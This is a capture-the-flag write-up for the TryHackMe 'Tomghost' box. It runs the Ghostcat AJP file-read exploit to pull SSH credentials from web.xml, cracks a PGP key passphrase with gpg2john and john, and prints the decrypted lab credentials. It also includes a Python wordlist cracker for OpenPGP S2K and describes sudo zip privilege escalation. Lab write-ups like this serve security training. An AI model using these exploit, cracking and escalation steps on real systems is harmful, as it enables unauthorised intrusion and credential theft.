# Tomghost-TryHackMe
> This is a writeup for the THM box Tomghost
>https://tryhackme.com/room/tomghost
>
> 
>
>
> `Difficulty: Easy`
>
> `Task 1`
>
> > 1. Compromise this machine and obtain `user.txt`
> > 2. Escalate privileges and obtain `root.txt`
>
---
## Solution
### nmap
> Running nmap against the target:
> 
>
>
> I found multiple services open (SSH, the Tomcat HTTP port and the AJP connector on 8009 among them).
> Going by the name of the challenge, I went to check `Tomcat` first.
>
---
### Tomcat
> Searching for exploits for `tomcat 9.0.30` I found [CVE-2020-1938](https://www.exploit-db.com/exploits/48143) ("Ghostcat"). It is a file read/inclusion bug in the AJP connector, not in the HTTP connector, which is why the exploit is pointed at port 8009 rather than the web port. Tomcat 9.0.31, 8.5.51 and 7.0.100 fixed it by binding AJP to localhost and requiring a shared secret by default.
> Using the exploit:
> ```bash
> # -p selects the AJP port; the script reads WEB-INF/web.xml from the webapp by default
> $ python 48143.py -p 8009 10.10.129.37
> ```
>
> 
>
>
>
> In the retrieved `web.xml` we found the SSH credentials for `skyfuck`.
>
---
### skyfuck
> I SSH into the box with the credentials found
> 
>
> and found two files in the home directory: `credential.pgp` and `tryhackme.asc`.
> `tryhackme.asc` is an ASCII-armored private key, so `credential.pgp` can be decrypted with it as explained [here](https://superuser.com/questions/46461/decrypt-pgp-file-using-asc-key),
> but it turns out the key itself is protected by a passphrase.
>
> 
>
> So I cracked the passphrase with john:
> ```bash
> # gpg2john pulls the S2K salt, iteration count and encrypted key material out of the armored key
> $ gpg2john tryhackme.asc >hash.txt
> # wordlist attack with rockyou
> $ john hash.txt -w=/usr/share/wordlists/rockyou.txt.gz
> ```
>
> 
>
>
> Importing the key and decrypting `credential.pgp` with `alexandru` as the passphrase gives the SSH credentials for `merlin`:
> ```text
> gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
> gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
> "tryhackme <stuxnet@tryhackme.com>"
> merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123js
> ```
>
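To make clear what john is iterating over once `gpg2john` has extracted the hash, here is an added example (not the page's code and not john's) of the OpenPGP iterated+salted string-to-key function (RFC 4880 section 3.7.1.3) that turns each candidate passphrase into a key, together with a wordlist loop over it. Real gpg2john/john verify a candidate by decrypting the secret key material (CAST5 in this writeup's output) and checking its SHA-1 checksum; this simplified version instead compares against a derived key we construct ourselves from a constructed salt, which costs the same S2K work per guess. The salt, the `0x60` coded count and the demo wordlist are constructed, not taken from the box.

```python
"""OpenPGP iterated+salted S2K (RFC 4880 3.7.1.3) and a wordlist loop over it.
Added example; not the page's code and not john's implementation."""
import hashlib


def s2k_count(coded_count):
    """Decode the one-octet coded iteration count into the number of octets
    hashed per guess: 1024 for 0x00 up to 65011712 for 0xff."""
    return (16 + (coded_count & 15)) << ((coded_count >> 4) + 6)


def s2k_iterated_salted(passphrase, salt, coded_count, key_len, hash_name="sha1"):
    """Derive key_len bytes by hashing salt+passphrase repeatedly until
    s2k_count() octets have been fed to the hash. If the key is longer than
    one digest, extra contexts preloaded with 0, 1, 2... zero bytes are used."""
    data = salt + passphrase
    count = max(s2k_count(coded_count), len(data))   # never hash less than one full copy
    digest_len = hashlib.new(hash_name).digest_size
    key = b""
    for ctx in range((key_len + digest_len - 1) // digest_len):
        h = hashlib.new(hash_name)
        h.update(b"\x00" * ctx)
        remaining = count
        while remaining > 0:
            chunk = data[:remaining]     # the final pass may be a prefix of data
            h.update(chunk)
            remaining -= len(chunk)
        key += h.digest()
    return key[:key_len]


def crack_s2k(candidates, salt, coded_count, target_key, hash_name="sha1"):
    """Return the first candidate whose derived key equals target_key, else None.
    This is the inner loop of a wordlist attack on a passphrase-protected key."""
    for passphrase in candidates:
        derived = s2k_iterated_salted(passphrase, salt, coded_count, len(target_key), hash_name)
        if derived == target_key:
            return passphrase
    return None


# Constructed demo parameters (not the box's key): an 8-byte salt, coded count
# 0x60 (65536 octets hashed per guess) and a 16-byte key as CAST5 would use.
DEMO_SALT = bytes.fromhex("0123456789abcdef")
DEMO_CODED_COUNT = 0x60
DEMO_TARGET = s2k_iterated_salted(b"alexandru", DEMO_SALT, DEMO_CODED_COUNT, 16)

if __name__ == "__main__":
    wordlist = [b"password", b"123456", b"alexandru", b"letmein"]   # constructed
    print("octets hashed per guess:", s2k_count(DEMO_CODED_COUNT))
    print("cracked passphrase:", crack_s2k(wordlist, DEMO_SALT, DEMO_CODED_COUNT, DEMO_TARGET))
```

The coded count is the only tunable that slows an attacker down: at `0x60` each guess costs one SHA-1 pass over 64 KiB, which is cheap enough that rockyou is exhausted in minutes; a key generated with a much higher count (the `0xff` maximum is about 62 MiB per guess) would have made the same wordlist attack far more expensive.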
---
### merlin
> SSHing in as merlin and checking what `sudo` allows,
>
> 
>
> I found that `/usr/bin/zip` could be run as root with `sudo`.
> The [gtfobins](https://gtfobins.github.io/) sudo entry for zip abuses its `-T`/`-TT` options, which run a user-supplied command to "test" the archive; run under sudo that command runs as root, and pointing it at a shell got me the root shell.
>
> 
>
> Hence the box is rooted `:]`
>
---